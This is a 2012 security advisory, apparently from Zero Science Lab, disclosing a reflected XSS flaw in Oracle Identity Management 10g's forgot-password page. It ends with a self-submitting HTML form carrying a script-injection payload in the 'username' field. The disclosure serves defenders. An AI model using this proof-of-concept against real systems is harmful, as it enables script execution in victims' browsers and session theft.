Oracle Identity Management 10g XSS Vulnerability

Risk: Low
Local: No
Remote: Yes

<!--

Oracle Identity Management 10g (username) XSS POST Injection Vulnerability

Vendor: Oracle Corporation
Product web page:
Affected version: 10g (

Summary: Oracle Identity Management enables organizations to effectively manage
the end-to-end lifecycle of user identities across all enterprise resources, both
within and beyond the firewall and into the cloud. The Oracle Identity Management
platform delivers scalable solutions for identity governance, access management
and directory services. This modern platform helps organizations strengthen
security, simplify compliance and capture business opportunities around mobile
and social access.

Desc: Oracle Identity Management suffers from a reflected XSS POST injection
vulnerability when parsing user input to the 'username' parameter via the POST
method through the '/usermanagement/forgotpassword/index.jsp' script. Attackers
can exploit this weakness to execute arbitrary HTML and script code in a user's
browser session.

Tested on: Oracle Application Server 10g httpd

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2012-5110
Advisory URL:

25.09.2012

-->

<html>
<head>
<title>Oracle Identity Management 10g (username) XSS POST Injection Vulnerability</title>
</head>
<body>
<form name="XSS" method="POST" action="">
<input type="hidden" name="btnSubmit" value="SUBMIT" />
<input type="hidden" name="username" value='"><script>alert(1);</script>' />
</form>
<script type="text/javascript">
document.XSS.submit();
</script>
</body>
</html>